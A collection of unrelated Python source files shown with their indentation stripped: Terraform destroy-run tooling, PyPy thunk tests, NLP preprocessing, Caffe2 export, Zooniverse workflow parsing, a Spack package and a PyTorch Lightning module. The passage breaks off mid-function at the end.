if len(sys.argv) != 2:
print('Usage: python3 destroy-plan.py [workspace-name]')
print('')
print('Please also ensure that the following environment variables are set to the appropriate values for your TFE install:')
print(' * TFE_TOKEN')
print(' * TFE_URL')
print(' * TFE_ORG')
exit(1)
TFE_TOKEN = os.getenv("TFE_TOKEN", None)
TFE_URL = os.getenv("TFE_URL", None)
TFE_ORG = os.getenv("TFE_ORG", None)
api = TFC(TFE_TOKEN, url=TFE_URL)
api.set_org(TFE_ORG)
destroy_run_id = queue_destroy_run(api, sys.argv[1])
print('Successfully queued destroy plan') |
from pypy.conftest import gettestobjspace
from pypy.interpreter import gateway
class AppTest_Thunk:
def setup_class(cls):
cls.space = gettestobjspace('thunk')
def test_simple(self):
from __pypy__ import thunk, become
computed = []
def f():
computed.append(True)
return 6*7
x = thunk(f)
assert computed == []
t = type(x)
assert t is int
assert computed == [True]
t = type(x)
assert t is int
assert computed == [True]
def test_setitem(self):
from __pypy__ import thunk, become
computed = []
def f(a):
computed.append(True)
return a*7
x = thunk(f, 6)
d = {5: x}
d[6] = x
d[7] = []
d[7].append(x)
assert computed == []
y = d[5], d[6], d.values(), d.items()
assert computed == []
d[7][0] += 1
assert computed == [True]
assert d[7] == [43]
def test_become(self):
from __pypy__ import thunk, become
x = []
y = []
assert x is not y
become(x, y)
assert x is y
def test_id(self):
from __pypy__ import thunk, become
# these are the Smalltalk semantics of become().
x = []; idx = id(x)
y = []; idy = id(y)
assert idx != idy
become(x, y)
assert id(x) == id(y) == idy
def test_double_become(self):
skip("fix me")
from __pypy__ import thunk, become
x = [1]
y = [2]
z = [3]
become(x, y)
become(y, z)
assert x is y is z
a = []
a.extend(x)
a.extend(y)
a.extend(z)
assert a == [3, 3, 3]
def test_double_become2(self):
from __pypy__ import thunk, become
x = []
y = []
z = []
become(x, y)
become(x, z)
assert x is y is z
def test_thunk_forcing_while_forcing(self):
from __pypy__ import thunk, become
def f():
return x+1
x = thunk(f)
raises(RuntimeError, 'x+1')
def test_thunk_forcing_while_forcing_2(self):
from __pypy__ import thunk, become
def f():
return x
x = thunk(f)
raises(RuntimeError, 'x+1')
def test_is_thunk(self):
from __pypy__ import thunk, become, is_thunk
def f():
pass
assert is_thunk(thunk(f))
assert not is_thunk(42)
def test_is_thunk2(self):
from __pypy__ import thunk, become, is_thunk
def f():
return 42
x = thunk(f)
assert is_thunk(x)
assert x == 42
assert not is_thunk(x)
def test_is_thunk_become(self):
from __pypy__ import thunk, become, is_thunk
def f():
return 42
x = thunk(f)
y = []
become(y, x)
assert is_thunk(y)
assert y == 42
assert not is_thunk(y)
def test_lazy(self):
from __pypy__ import lazy
lst = []
def f(x):
lst.append(x)
return x+5
f = lazy(f)
y = f(3)
assert lst == []
assert type(y) is int
assert lst == [3]
assert type(y) is int
assert lst == [3]
def test_exception_in_thunk(self):
from __pypy__ import lazy
def f(x):
if x:
return 42
raise ValueError
f = lazy(f)
y = f(3)
assert y == 42
y = f(0)
raises(ValueError, "str(y)")
raises(ValueError, "str(y)")
def test_become_yourself(self):
from __pypy__ import become
x = []
become(x, x)
assert str(x) == "[]"
def test_thunk_special_method(self):
skip("fix me")
from __pypy__ import thunk
x = thunk(lambda : 42)
assert 1 .__add__(x) == 43
class AppTest_ThunkCallMethod(AppTest_Thunk):
def setup_class(cls):
cls.space = gettestobjspace('thunk', CALL_METHOD=True, multimethods='doubledispatch')
def test_method_call(self):
from __pypy__ import thunk
d = {}
# need the method to use the pypy compiler
exec """if 1:
def f(x):
return [x]
def g(l):
l.append(1)
""" in d
l = thunk(d['f'], 10)
d['g'](l)
assert l == [10, 1]
class AppTest_ThunkCallMethodMRD(AppTest_ThunkCallMethod):
def setup_class(cls):
cls.space = gettestobjspace('thunk', CALL_METHOD=True, multimethods='mrd')
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# NLP
# Import the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Import dataset
dataset = pd.read_csv('Restaurant_Reviews.tsv', delimiter = '\t', quoting = 3)
# Clean up review text
import re
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
corpus = []
for i in range(0, len(dataset)):
review = re.sub('[^a-zA-Z]', ' ', dataset['Review'][i])
review = review.lower()
review = review.split()
ps = PorterStemmer()
review = [ps.stem(word) for word in review if not word in set(stopwords.words('english'))]
review = ' '.join(review)
corpus.append(review)
# Creating the bag of words model
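# A minimal sketch of that bag-of-words step, assuming the usual scikit-learn
# CountVectorizer approach (max_features=1500 is an illustrative choice, not
# taken from the original script):
from sklearn.feature_extraction.text import CountVectorizer
cv = CountVectorizer(max_features=1500)
X = cv.fit_transform(corpus).toarray()
|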
# external
import pytest
# project
from flake8_codes._codes import extract
from flake8_codes._codes._default import extract_default
from flake8_codes._codes._registry import registry
# app
from ._constants import KNOWN_PLUGINS
@pytest.mark.parametrize('plugin_name', KNOWN_PLUGINS)
def test_smoke_extract(plugin_name):
codes = extract(plugin_name)
assert codes
for code, msg in codes.items():
assert type(code) is str, 'bad code type'
assert type(msg) is str, 'bad message type'
# that's not exactly true but all plugins follow this convention
assert code[0].isalpha(), 'code must start from letter'
assert code[0].isupper(), 'code must be uppercase'
@pytest.mark.parametrize('plugin_name', KNOWN_PLUGINS)
def test_no_custom_extractor_needed(plugin_name):
extractor = registry.get(plugin_name)
if extractor is None:
return
custom_codes = extractor()
default_codes = extract_default(plugin_name)
assert default_codes != custom_codes
|
#!/usr/bin/env python
import struct
SIGNATURE_AREA_SIZE = 512 - 8
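# Prepared image layout: 4-byte magic "SHWF", 4-byte little-endian firmware
# length, then a zero-filled signature area that pads the header to 512 bytes.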
def main():
fw = open("fw.bin", "rb").read()
if fw[:4] == b'SHWF':
print("Firmware already prepared")
exit(1)
header = b'SHWF'
header += struct.pack('<I', len(fw))
header += b'\x00' * SIGNATURE_AREA_SIZE
open("fw.bin", "wb").write(header + fw)
if __name__ == '__main__':
main() |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
import numpy as np
from mobile_cv.torch.utils_caffe2.ws_utils import ScopedWS
logger = logging.getLogger(__name__)
# NOTE: specific export_to_db for (data, im_info) dual inputs.
# modified from mobile-vision/common/utils/model_utils.py
def export_to_db(net, params, inputs, outputs, out_file, net_type=None, shapes=None):
# NOTE: special handling for im_info: by default the "predict_init_net"
# will zero_fill inputs/outputs (https://fburl.com/diffusion/nvksomrt),
# however the actual value of "im_info" also matters, so we need use
# extra_init_net to handle this.
import numpy as np
from caffe2.python import core
assert len(inputs) == 2
data_name, im_info_name = inputs
data_shape = shapes[data_name] # assume NCHW
extra_init_net = core.Net("extra_init_net")
im_info = np.array(
[[data_shape[2], data_shape[3], 1.0] for _ in range(data_shape[0])],
dtype=np.float32,
)
extra_init_net.GivenTensorFill(
[], im_info_name, shape=shapes[im_info_name], values=im_info
)
from caffe2.caffe2.fb.predictor import predictor_exporter # NOTE: slow import
predictor_export_meta = predictor_exporter.PredictorExportMeta(
predict_net=net,
parameters=params,
inputs=inputs,
outputs=outputs,
net_type=net_type,
shapes=shapes,
extra_init_net=extra_init_net,
)
logger.info("Writing logdb {} ...".format(out_file))
predictor_exporter.save_to_db(
db_type="log_file_db",
db_destination=out_file,
predictor_export_meta=predictor_export_meta,
)
def export_to_logfiledb(predict_net, init_net, outfile, ws_blobs):
logger.info("Exporting Caffe2 model to {}".format(outfile))
shapes = {
b: data.shape if isinstance(data, np.ndarray)
        # provide a dummy shape if it could not be inferred
else [1]
for b, data in ws_blobs.items()
}
with ScopedWS("__ws_tmp__", is_reset=True) as ws:
ws.RunNetOnce(init_net)
initialized_blobs = set(ws.Blobs())
uninitialized = [
inp for inp in predict_net.external_input if inp not in initialized_blobs
]
params = list(initialized_blobs)
output_names = list(predict_net.external_output)
export_to_db(
predict_net, params, uninitialized, output_names, outfile, shapes=shapes
)
|
import sys, os, ujson
import numpy as np
import pandas as pd
'''
extracts a specific workflow with id workflow_id and version number workflow_version
from a dataframe workflow_df that's read from a workflows file, with accompanying
workflow_cont_df that's read from a workflow contents file.
The needed workflow files are exportable from the Data Exports page in the Project Builder.
The purpose of extracting a workflow is to figure out what structure the annotations
json will have in the classifications exports.
The workflow ID and current workflow version should appear in the project builder
on the page for that workflow. The workflow_version should be the full version, which
is stored as a decimal, even though it's really two integers concatenated with a .
(the major and minor versions of a workflow increment independently of one another).
Returns a dict containing information about the workflow structure, which is used
to create aggregated classifications for the project.
Example: if I want to extract workflow information from the Flying HI project for
the beta workflow (id 3590), version 12.33, I would first read in the workflow info
in a Python/iPython window or in another script with:
workflow_df = pd.read_csv('flying-hi-workflows.csv')
workflow_cdf = pd.read_csv('flying-hi-workflow_contents.csv')
then, to run this and get the output, I'd call:
workflow_info = get_workflow_info(workflow_df, workflow_cdf, 3590, 12.33)
There is only 1 task in that workflow, with 3 drawing tools and a text sub-task
so workflow_info looks like:
In [170]: workflow_info
Out[170]:
{'n_tasks': 1,
'tasknames': ['T0'],
'T0_fulltext': u'Mark any features you see. \n\nUse the "Need some help" button below to see more information.\n\nIf the image is featureless, just click "Done".',
'T0_shorttext': u'mark_any_feature___just_click_done',
'T0_type': 'drawing',
'T0_ntools': 3,
'T0_tool0_type': 'point',
'T0_tool0_ndetails': 0,
'T0_tool1_type': 'line',
'T0_tool1_ndetails': 0,
'T0_tool2_type': 'ellipse',
'T0_tool2_ndetails': 1,
'T0_tool2_detail0_type': 'text'}
where I've sorted this so it's easier to read (the returned dict isn't sorted).
Note, the shorttext is a compression of the full question text, with punctuation
stripped and spaces replaced with underscores. It's a guess at what you might like
the headers of your aggregated data export columns to contain, but it's often a
terrible guess (task description text often starts or ends with a general direction
to click the help button or classify the central object in the image, for example,
and this sometimes ends up grabbing that), so feel free to replace it with
something that better describes the task.
'''
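# NOTE: get_short_slug() is used throughout but is not defined in this excerpt.
# Based on the docstring above (punctuation stripped, spaces replaced with
# underscores, capped at maxlength characters), it presumably looks roughly
# like the following sketch (kept commented out so as not to shadow the real
# definition):
# import re
# def get_short_slug(text):
#     slug = re.sub(r'[^a-z0-9 ]', '', text.lower().strip()).replace(' ', '_')
#     return slug[:maxlength]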
def get_workflow_info(workflow_df, workflow_cont_df, workflow_id, workflow_version):
# initialize the output
workflow_info = {}
# max length of a question label below
global maxlength
maxlength = 35
# get the major and minor workflow versions
wfstr = (str(workflow_version)).split('.')
wf_major = int(wfstr[0])
try:
wf_minor = int(wfstr[1])
    except IndexError:
        # you'll be here if only the major workflow version was supplied.
        # In that case just use the most recent minor version for this major version
        wf_minor = np.max(workflow_cont_df['version'][workflow_cont_df['workflow_id'] == workflow_id].unique())
# parse the tasks column as a json so we can work with it (it just loads as a string)
workflow_df['tasks_json'] = [ujson.loads(q) for q in workflow_df['tasks']]
workflow_cont_df['strings_json'] = [ujson.loads(q) for q in workflow_cont_df['strings']]
# identify the row of the workflow dataframe we want to extract
is_theworkflow = (workflow_df['workflow_id'] == workflow_id) & (workflow_df['version'] == wf_major)
is_ctheworkflow = (workflow_cont_df['workflow_id'] == workflow_id) & (workflow_cont_df['version'] == wf_minor)
# extract it
theworkflow = workflow_df[is_theworkflow]
ctheworkflow = workflow_cont_df[is_ctheworkflow]
# pandas is a little weird about accessing stuff sometimes
# we should only have 1 row in theworkflow but the row index will be retained
# from the full workflow_df, so we need to figure out what it is
i_wf = theworkflow.index[0]
i_cwf = ctheworkflow.index[0]
# extract the tasks as a json
tasks = theworkflow['tasks_json'][i_wf]
strings = ctheworkflow['strings_json'][i_cwf]
workflow_info = tasks.copy()
    tasknames = list(workflow_info.keys())
workflow_info['tasknames'] = tasknames
# now that we've extracted the actual task names, add the first task
workflow_info['first_task'] = theworkflow['first_task'].values[0]
# now join workflow structure to workflow label content for each task
for task in tasknames:
taskslug = get_short_slug(task.lower())
# we don't need the help text and it just clutters things/takes up memory
try:
workflow_info[task]['help'] = ''
except:
pass
################
# question task
################
if (workflow_info[task]['type'] == 'single') | (workflow_info[task]['type'] == 'multiple'):
# first, the question text for the task
q_label = strings[workflow_info[task]['question']]
q_slug = get_short_slug(q_label.lower())
workflow_info[task]['question'] = q_label
# now make a slug for it
workflow_info[task]['question_slug'] = "%s_%s" % (taskslug, q_slug)
# now, do the same for each of the answers
for i, ans in enumerate(workflow_info[task]['answers']):
a_label = strings[workflow_info[task]['answers'][i]['label']]
workflow_info[task]['answers'][i]['label'] = a_label
workflow_info[task]['answers'][i]['label_slug'] = "%s_%s_a%d_%s" % (taskslug, q_slug, i, get_short_slug(a_label.lower()))
################
# drawing task
################
if (workflow_info[task]['type'] == 'drawing'):
# first, the instruction text for the task
# analogous to ['question'] for question tasks above
q_label = strings[workflow_info[task]['instruction']]
q_slug = get_short_slug(q_label.lower())
workflow_info[task]['instruction'] = q_label
# now make a slug for it
workflow_info[task]['instruction_slug'] = "%s_%s" % (taskslug, q_slug)
# now, do the same for each of the drawing tools
for i, ans in enumerate(workflow_info[task]['tools']):
a_label = strings[workflow_info[task]['tools'][i]['label']]
workflow_info[task]['tools'][i]['label'] = a_label
workflow_info[task]['tools'][i]['label_slug'] = "%s_%s_a%d_%s" % (taskslug, q_slug, i, get_short_slug(a_label.lower()))
################
# survey task
################
if (workflow_info[task]['type'] == 'survey'):
# yay
# deal with the survey choices (e.g. species)
workflow_info[task]['choices_slug'] = [taskslug + '_' + get_short_slug(x.lower()) for x in workflow_info[task]['choicesOrder']]
for i_c, choice in enumerate(workflow_info[task]['choices'].keys()):
c_label = strings[workflow_info[task]['choices'][choice]['label']]
workflow_info[task]['choices'][choice]['label'] = c_label
workflow_info[task]['choices'][choice]['label_slug'] = "%s_%s" % (taskslug, get_short_slug(choice).lower())
# deal with the questions attached to every survey choice
# e.g. "is [this species] moving, standing, or sleeping?"
# because these will always be attached to a species, keep the
# slugs short and don't repeat the taskname in them
for i_q, q in enumerate(workflow_info[task]['questions'].keys()):
q_key = get_short_slug(q.lower())
q_label = strings[workflow_info[task]['questions'][q]['label']]
workflow_info[task]['questions'][q]['label'] = q_label
# now make a slug for it
q_slug = get_short_slug(q_label.lower())
workflow_info[task]['questions'][q]['label_slug'] = q_slug
# each question has a set of possible answers (loop through them in order)
for i_a, a in enumerate(workflow_info[task]['questions'][q]['answersOrder']):
a_label = strings[workflow_info[task]['questions'][q]['answers'][a]['label']]
workflow_info[task]['questions'][q]['answers'][a]['label'] = a_label
workflow_info[task]['questions'][q]['answers'][a]['label_slug'] = "%s_a%d_%s" % (q_key, i_a, get_short_slug(a_label.lower()))
################
# shortcut (tickbox) task
################
if (workflow_info[task]['type'] == 'shortcut'):
# the annotations return the label but not the index or key of the answer
# so make a map
workflow_info[task]['answer_map'] = {}
for i_a, ans in enumerate(workflow_info[task]['answers']):
a_label = strings[workflow_info[task]['answers'][i_a]['label']]
workflow_info[task]['answers'][i_a]['label'] = a_label
workflow_info[task]['answer_map'][a_label] = i_a
workflow_info[task]['answers'][i_a]['label_slug'] = "%s_a%d_%s" % (taskslug, i_a, get_short_slug(a_label.lower()))
return workflow_info
# a handful of old scripts will use this format, but most will use the new format
def get_workflow_info_old(workflow_df, workflow_cont_df, workflow_id, workflow_version):
# initialize the output
workflow_info = {}
# max length of a question label below
maxlength = 35
# get the major and minor workflow versions
wfstr = (str(workflow_version)).split('.')
wf_major = int(wfstr[0])
try:
wf_minor = int(wfstr[1])
    except IndexError:
        # you'll be here if only the major workflow version was supplied.
        # In that case just use the most recent minor version for this major version
        wf_minor = np.max(workflow_cont_df['version'][workflow_cont_df['workflow_id'] == workflow_id].unique())
# parse the tasks column as a json so we can work with it (it just loads as a string)
workflow_df['tasks_json'] = [ujson.loads(q) for q in workflow_df['tasks']]
workflow_cont_df['strings_json'] = [ujson.loads(q) for q in workflow_cont_df['strings']]
# identify the row of the workflow dataframe we want to extract
is_theworkflow = (workflow_df['workflow_id'] == workflow_id) & (workflow_df['version'] == wf_major)
is_ctheworkflow = (workflow_cont_df['workflow_id'] == workflow_id) & (workflow_cont_df['version'] == wf_minor)
# extract it
theworkflow = workflow_df[is_theworkflow]
ctheworkflow = workflow_cont_df[is_ctheworkflow]
# pandas is a little weird about accessing stuff sometimes
# we should only have 1 row in theworkflow but the row index will be retained
# from the full workflow_df, so we need to figure out what it is
i_wf = theworkflow.index[0]
i_cwf = ctheworkflow.index[0]
# extract the tasks as a json
tasks = theworkflow['tasks_json'][i_wf]
strings = ctheworkflow['strings_json'][i_cwf]
# not actually sure we need this but let's do it anyway
first_task = theworkflow['first_task'][i_wf]
# save the task count to the output
workflow_info['n_tasks'] = len(tasks)
# iterate through tasks and get the info on what's being measured in the classification
tasknames = []
#workflow_info['tasknames'] = tasknames
for i, task in enumerate(tasks.keys()):
# update the list of task names
tasknames.append(task)
task_type = tasks[task]['type']
workflow_info[task+'_type'] = task_type
# there are several types of tasks, and what populates the json depends
# on the task.
# 'single' = a question task with a single answer choice
# 'multiple' = a question task with multiple possible answers
# 'drawing' = a drawing tasks with potentially multiple drawing tools
# and there are survey and text tasks but I am not doing those yet
# Question task
if (task_type == 'single') | (task_type == 'multiple'):
#print("Question task")
# for these purposes we're not going to retain the flow of tasks. We care
# about how many possible answers there are, so we know how to extract
# them from each classification later.
n_answers = len(tasks[task]['answers'])
workflow_info[task+'_nanswers'] = n_answers
# extract the question text
workflow_info[task+'_fulltext'] = strings[task+'.question']
# the doubling of .replace('__', '_') is in case there are any "\n\n\n" strings
qr = get_short_slug(workflow_info[task+'_fulltext'])
workflow_info[task+'_shorttext'] = qr
# Drawing task
elif task_type == 'drawing':
# get the tools that are in this task
these_tools = tasks[task]['tools']
# report back the count of tools there are in the task
n_tools = len(these_tools)
workflow_info[task+'_ntools'] = n_tools
# extract the question text
workflow_info[task+'_fulltext'] = strings[task+'.instruction']
qr = get_short_slug(workflow_info[task+'_fulltext'].lower())
workflow_info[task+'_shorttext'] = qr
# now extract the information from each tool in the task
for j in range(n_tools):
toolstr = '%s_tool%d' % (task, j)
tool = these_tools[j]
# every tool has a type, and what we do later depends on it, so report it
# e.g. elliptical, point, polygon, etc etc.
workflow_info[toolstr+'_type'] = tool['type']
n_deets = len(tool['details'])
workflow_info[toolstr+'_ndetails'] = n_deets
# if there are further details, record those too
# "details" = sub-tasks
# pretty sure the details can be either free text or questions
if n_deets > 0:
# writing this is making me hate subtasks
# there can be an arbitrary number of subtask questions
# and also the subtask questions can be single, multiple or text
for k in range(n_deets):
deets_str = '%s_detail%d' % (toolstr, k)
deets_type = tool['details'][k]['type']
workflow_info[deets_str+'_type'] = deets_type
# if it's a text sub-task there's just 1 text box and we're good
# if it's a question sub-task we need to add an answer count
if (deets_type == 'single') | (deets_type == 'multiple'):
workflow_info[deets_str+'_nanswers'] = len(tool['details'][k]['answers'])
elif task_type == 'survey':
# the workflow file contains a lot of info about the survey but I think we don't necessarily need to specify it all
workflow_info[task+'_nquestions'] = len(tasks[task]['questions'].keys())
workflow_info[task+'_questions'] = tasks[task]['questions'].keys()
workflow_info[task+'_nchoices'] = len(tasks[task]['choices'].keys())
workflow_info[task+'_choices'] = tasks[task]['choicesOrder']
# we need the name of the task that says e.g. "nothing here"
workflow_info[task+'_unlinkedTask'] = tasks[task]['unlinkedTask']
# get info about which questions have multiple answers
workflow_info[task+'_q_multiple'] = {}
for q in tasks[task]['questions'].keys():
workflow_info[task+'_q_multiple'][q] = tasks[task]['questions'][q]['multiple']
elif task_type == 'shortcut':
# don't really do anything, because this should (?) be a single checkbox
# e.g. "Nothing here"
workflow_info[task+'_nanswers'] = len(tasks[task]['answers'])
acol = []
acol_slug = []
for ans in tasks[task]['answers']:
acol.append(strings[ans['label']])
qr = get_short_slug(strings[ans['label']].lower())
acol_slug.append(qr)
workflow_info[task+'_answers'] = acol
workflow_info[task+'_answers_slug'] = acol_slug
# now that we've looped through all tasks, save the list of task names too
workflow_info['tasknames'] = tasknames
return workflow_info
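# Illustrative sketch (hypothetical workflow, not taken from the data): if the
# workflow's only task were a 'single' question task named 'T0' with 3 answers,
# the dict returned above would contain roughly
#   workflow_info['n_tasks']      = 1
#   workflow_info['T0_type']      = 'single'
#   workflow_info['T0_nanswers']  = 3
#   workflow_info['T0_fulltext']  = strings['T0.question']
#   workflow_info['T0_shorttext'] = get_short_slug(workflow_info['T0_fulltext'])
#   workflow_info['tasknames']    = ['T0']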
# get the names of columns to appear in the eventual aggregated classification output
#
def get_class_cols(workflow_info):
class_cols = []
# always store the total classification count
class_cols.append('class_count')
for task in workflow_info['tasknames']:
thetask = workflow_info[task]
####################
# question task
####################
if (thetask['type'] == 'single') | (thetask['type'] == 'multiple'):
# we aggregate questions into fractions, so for each question task we need
# a count of classifiers who answered the question, counts for each response,
# and fractions for each response. This is the same whether or not the
# question accepts multiple answers in a single classification.
q_slug = thetask['question_slug']
# add the vote count for this task
class_cols.append("%s_count" % q_slug)
for i, ans in enumerate(thetask['answers']):
a_slug = thetask['answers'][i]['label_slug']
class_cols.append("%s_count" % a_slug)
class_cols.append("%s_frac" % a_slug)
####################
# drawing task
####################
# to do
####################
# survey task
####################
if (thetask['type'] == 'survey'):
# note: below, "choices" <--> "species"
# and "questions" <--> "behavior"
# because I'm thinking about these in terms of ecology projects
# but in fact they're coded in Panoptes more generally than that.
# surveys are basically an annotations matrix, with species on one
# axis and behaviors on the other.
# (plus the "shortcut" of e.g. "nothing here" or "fire", etc., but
# those are dealt with separately below)
# If we're looking to flatten this to make it easier for research
# teams to deal with, we need 1 column for each entry in that matrix.
#
# That means a lot of columns, even before trying to keep track
# of counts *and* fractions.
#
# Python can handle this, but it might get unwieldy for research
# teams, especially if many of those columns are likely to be blank.
# For now, we just need to define them all, and then try to
# compress later by e.g. ignoring empty columns.
# for each species choice, define count/frac and behavior columns
for choice in thetask['choices_slug']:
# the choices_slug entry should already have the task name in it
class_cols.append("%s_count" % choice)
#class_cols.append("%s_frac" % choice)
for q in thetask['questionsOrder']:
q_slug = thetask['questions'][q]['label_slug']
class_cols.append("%s_%s_count" % (choice, q_slug))
#class_cols.append("%s_%s_frac" % (choice, q_slug))
for a in thetask['questions'][q]['answersOrder']:
# the answer slug already has a short form of the question in it
a_slug = thetask['questions'][q]['answers'][a]['label_slug']
class_cols.append("%s_%s_count" % (choice, a_slug))
#class_cols.append("%s_%s_frac" % (choice, a_slug))
####################
# shortcut task
####################
if (thetask['type'] == 'shortcut'):
# This is very similar to the question task above, but there isn't
# any question text, so just do the answers
for i, ans in enumerate(thetask['answers']):
a_slug = thetask['answers'][i]['label_slug']
class_cols.append("%s_count" % a_slug)
class_cols.append("%s_frac" % a_slug)
return class_cols
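# Illustrative sketch (hypothetical workflow_info, not from the data): for one
# yes/no question task whose question_slug is 'T0_is_there_an_animal' and whose
# answer label_slugs are 'T0_yes' and 'T0_no', the list built above would be
#   ['class_count', 'T0_is_there_an_animal_count',
#    'T0_yes_count', 'T0_yes_frac', 'T0_no_count', 'T0_no_frac']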
def translate_non_alphanumerics(to_translate, translate_to=u'_'):
not_letters_or_digits = u'!"#%\'()*+,-./:;<=>?@[\]^_`{|}~'
translate_table = dict((ord(char), translate_to) for char in not_letters_or_digits)
return to_translate.translate(translate_table)
def get_short_slug(thestr):
qq = (translate_non_alphanumerics(thestr, translate_to=u'')).replace('\n', '_').replace(' ', '_').replace('__', '_').replace('__', '_')
if len(qq) > maxlength:
ii = (maxlength-2)//2  # integer division so the slice indices stay ints
qr = qq[:ii]+'__'+qq[-ii:]
else:
qr = qq
if qr.startswith('_'):
qr = qr[1:]
if qr.endswith('_'):
qr = qr[:-1]
return qr
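# Illustrative example (assumes maxlength is defined earlier in this file, e.g. maxlength = 20):
#   get_short_slug("Is there an animal?")  ->  "Is_there_an_animal"
# punctuation is stripped, whitespace becomes underscores, and strings longer
# than maxlength are elided in the middle with '__'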
#
|
# Write a procedure: given a list that may contain nested lists, return a flat list with no sublists.
# input:  [1, [2, 0], [3, 0, [4, 7, 5]]]
# output: x = [1, 2, 0, 3, 0, 4, 7, 5]
def get_final_list(a_list):
final_list = []
to_check = a_list
#print to_check
while to_check:
if isinstance(to_check[0], list) or isinstance(to_check[0], tuple):
new_list = to_check[0]
del to_check[0]
#print to_check
to_check = new_list + to_check # NOT to_check += new_list
#print to_check
else:
final_list.append(to_check[0])
del to_check[0]
#print final_list
return final_list
def is_sublist(i):
if isinstance(i, list) or isinstance(i, tuple):
return True
else:
return False
# x = [1, [2, 0], [3, 0, [4, 7, 5]]]
# print get_final_list(x)
# >>>[1, 2, 0, 3, 0, 4, 7, 5]
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Mc(AutotoolsPackage):
"""The GNU Midnight Commander is a visual file manager."""
homepage = "https://midnight-commander.org"
url = "http://ftp.midnight-commander.org/mc-4.8.20.tar.bz2"
version('4.8.23', sha256='238c4552545dcf3065359bd50753abbb150c1b22ec5a36eaa02c82808293267d')
version('4.8.21', sha256='251d9f0ef9309ef3eea0fdc4c12b8b61149e5056bef1b2de2ccc7f015d973444')
version('4.8.20', sha256='2d85daaa6ab26e524946df4823ac2f69802bc16bc967781b5e28d5b86fc3b979')
depends_on('ncurses')
depends_on('pkgconfig', type='build')
depends_on('glib@2.14:')
depends_on('libssh2@1.2.5:')
def setup_build_environment(self, env):
# Fix compilation bug on macOS by pretending we don't have utimensat()
# https://github.com/MidnightCommander/mc/pull/130
if 'darwin' in self.spec.architecture:
env.set('ac_cv_func_utimensat', 'no')
def configure_args(self):
args = [
'--disable-debug',
'--disable-dependency-tracking',
'--disable-silent-rules',
'--without-x',
'--with-screen=ncurses',
'--enable-vfs-sftp'
]
return args
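# Illustrative usage (assuming this file is placed in a Spack repo as
# var/spack/repos/builtin/packages/mc/package.py):
#   spack install mc@4.8.23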
|
# System imports
import sys
import os
# 3rd party imports
import numpy as np
import torch
from torch.nn import Linear
import torch.nn.functional as F
from torch.utils.data import random_split
from torch.utils.data import Dataset
from torch_geometric.data import DataLoader
from torch_cluster import radius_graph
import pytorch_lightning as pl
from pytorch_lightning import LightningModule
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Local imports
from exatrkx.src.utils_torch import graph_intersection
from exatrkx.src import utils_dir
def load_dataset(input_dir, num):
if not os.path.exists(input_dir):
return None
all_events = os.listdir(input_dir)
all_events = sorted([os.path.join(input_dir, event) for event in all_events])
loaded_events = [torch.load(event, map_location=torch.device('cpu')) for event in all_events[:num]]
return loaded_events
class FilterBase(LightningModule):
def __init__(self, hparams):
super().__init__()
'''
Initialise the Lightning Module that can scan over different filter training regimes
'''
# Assign hyperparameters
self.hparams = hparams
self.hparams['input_dir'] = utils_dir.embedding_outdir
self.hparams['output_dir'] = utils_dir.filtering_outdir
def setup(self, stage):
datatypes = ["train", "val", "test"]
input_dirs = [os.path.join(self.hparams["input_dir"], datatype) for datatype in datatypes]
self.trainset, self.valset, self.testset = [load_dataset(input_dir, self.hparams["train_split"][i])
for i, input_dir in enumerate(input_dirs)]
def train_dataloader(self):
if len(self.trainset) > 0:
return DataLoader(self.trainset, batch_size=1, num_workers=1)
else:
return None
def val_dataloader(self):
if len(self.valset) > 0:
return DataLoader(self.valset, batch_size=1, num_workers=1)
else:
return None
def test_dataloader(self):
if len(self.testset):
return DataLoader(self.testset, batch_size=1, num_workers=1)
else:
return None
def configure_optimizers(self):
optimizer = [torch.optim.AdamW(self.parameters(), lr=(self.hparams["lr"]), betas=(0.9, 0.999), eps=1e-08, amsgrad=True)]
scheduler = [
{
'scheduler': torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer[0], factor=self.hparams["factor"], patience=self.hparams["patience"]),
'monitor': 'val_loss',
'interval': 'epoch',
'frequency': 1
}
]
# scheduler = [torch.optim.lr_scheduler.StepLR(optimizer[0], step_size=1, gamma=0.3)]
return optimizer, scheduler
def training_step(self, batch, batch_idx):
emb = (None if (self.hparams["emb_channels"] == 0)
else batch.embedding) # Does this work??
if self.hparams['ratio'] != 0:
num_true, num_false = batch.y.bool().sum(), (~batch.y.bool()).sum()
fake_indices = torch.where(~batch.y.bool())[0][torch.randint(num_false, (num_true.item()*self.hparams['ratio'],))]
true_indices = torch.where(batch.y.bool())[0]
combined_indices = torch.cat([true_indices, fake_indices])
# Shuffle indices:
combined_indices = combined_indices[torch.randperm(len(combined_indices))]
weight = (torch.tensor(self.hparams["weight"]) if ("weight" in self.hparams)
else torch.tensor(self.hparams['ratio']))
else:
combined_indices = torch.arange(batch.e_radius.shape[1])
weight = (torch.tensor(self.hparams["weight"]) if ("weight" in self.hparams)
else torch.tensor((~batch.y.bool()).sum() / batch.y.sum()))
output = (self(torch.cat([batch.cell_data, batch.x], axis=-1), batch.e_radius[:,combined_indices], emb).squeeze()
if ('ci' in self.hparams["regime"])
else self(batch.x, batch.e_radius[:,combined_indices], emb).squeeze())
if ('pid' in self.hparams["regime"]):
y_pid = batch.pid[batch.e_radius[0,combined_indices]] == batch.pid[batch.e_radius[1,combined_indices]]
loss = F.binary_cross_entropy_with_logits(output, y_pid.float(), pos_weight = weight)
else:
loss = F.binary_cross_entropy_with_logits(output, batch.y[combined_indices], pos_weight = weight)
self.log('train_loss', loss, prog_bar=True)
return loss
def validation_step(self, batch, batch_idx):
emb = (None if (self.hparams["emb_channels"] == 0)
else batch.embedding) # Does this work??
subset_ind = torch.randint(batch.e_radius.shape[1], (int(batch.e_radius.shape[1]*self.hparams['val_subset']),))
output = self(torch.cat([batch.cell_data, batch.x], axis=-1), batch.e_radius[:, subset_ind], emb).squeeze() if ('ci' in self.hparams["regime"]) else self(batch.x, batch.e_radius[:, subset_ind], emb).squeeze()
val_loss = F.binary_cross_entropy_with_logits(output, batch.y[subset_ind])
